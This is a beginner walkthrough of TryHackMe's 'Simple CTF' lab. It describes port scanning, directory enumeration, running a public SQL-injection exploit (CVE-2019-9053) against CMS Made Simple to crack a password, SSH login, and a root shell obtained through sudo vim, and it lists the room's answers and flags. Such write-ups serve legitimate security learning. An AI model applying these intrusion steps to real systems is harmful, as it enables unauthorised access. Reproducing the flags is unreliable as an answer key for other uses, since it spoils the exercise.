Hi! It is time to have a thorough look at the Simple CTF room on TryHackMe. This one has a bit of everything, and therefore a great CTF for a beginner.
I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by THMs rooms. Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.
Room URL: https://tryhackme.com/room/easyctf
Task 1 (Simple CTF)
Deploy the machine and attempt the questions!
When you visit the IP address we get to the following page:
It looks like a default Ubuntu installation. Hmm.. Let’s get to the questions!
Questions
How many services are running under port 1000?
To answer this question we can use NMap to find out more.
nmap -sS -Pn -T4 -p 0–999 <ip>
With -sS being a stealth scan (which avoid the 3 part handshake to avoid detection, which is great for a quick port scan). -Pn disables ping and only scans for open ports, again to avoid detection. -T4 slightly quickens the scan, although it is a bit more agressive. -p- means scanning all ports.
Answer: 2
What is running on the higher port?
Now we know about port 21, 80 and 2222 we can get more info on them by using the -A flag:
nmap -A -Pn -T4 -p21,80,2222 TARGET_IP
There are quite a few interesting facts here. We can see a FTP with anonymous login, a robots.txt file with disallowed entries, and relevant to this question, SSH access.
Answer: ssh
What’s the CVE you’re using against the application?
We need to enumerate a bit more. Let’s use gobuster to find out about files and directories on the server:
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u <ip>
A lot of interesting discoveries here. The one that stands out is the /simple page:
It shows a webpage running on CMS made simple. In the bottom we can find a version number:
Let’s see if we can find exploits by using searchsploit cms made simple 2.2.8:
More info can be found here:
This is the right exploit!
Answer: CVE-2019–9053
To what kind of vulnerability is the application vulnerable?
This is a SQL injection vulnerability, in short: SQLi.
Answer: SQLi
What’s the password?
Let’s download the script by using wget:
wget https://www.exploit-db.com/download/46635
Then we can run this python by writing:
python2 exploit.py -u <url>
Some notes:
- We need to have use python2, as the print statements for example using python 2 syntax.
- If you do not have the requests module installed run the following command: python2 -m pip install requests
- The same goes for a module called termcolor
After these changes we should be able to run the previous command. However, since we are interested in the password we need to use the -c flag together with the -w flag (for wordlist).
python2 exploit.py -u <url> -c -w /usr/share/wordlists/rockyou.txt
We find the following:
Answer: secret
Where can you login with the details obtained?
Well, we have a SSH so let’s try logging in 🙂
We are logged in. Note: it is important to add the -p flag with the port 2222. Otherwise the terminal just waits.
Answer: ssh
What’s the user flag?
A simple ls, followed by cat user.txt gives us the anwer:
Answer: G00d j0b, keep up!
Is there any other user in the home directory? What’s its name?
We are in the mitch home directory, so let’s go one directory up and list the folders.
Answer: sunbath
What can you leverage to spawn a privileged shell?
Let’s list the allowed commands for the user.
We got access to the vim shell.
Answer: vim
What’s the root flag?
We need to use vim to get a root shell. We do this like this:
sudo vim -c ‘:!/bin/sh’
This gives us a root shell:
Answer: W3ll d0n3. You made it!
We are done!
Bonus tidbit:
There is a little bit of an easter egg on the FTP server. You can connect to it with ftp@<ip>. Then you write ‘Anonymous’. You can find a txt file in there which you can read with get ForMitch.txt –.
This would have given us some extra info on both usernames and password 🙂
Anyway, thanks for reading! That’s Simple CTF over with!
Like my articles?
You are welcome to give my article a clap or two 🙂
I would be so grateful if you support me by buying me a cup of coffee:
I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link: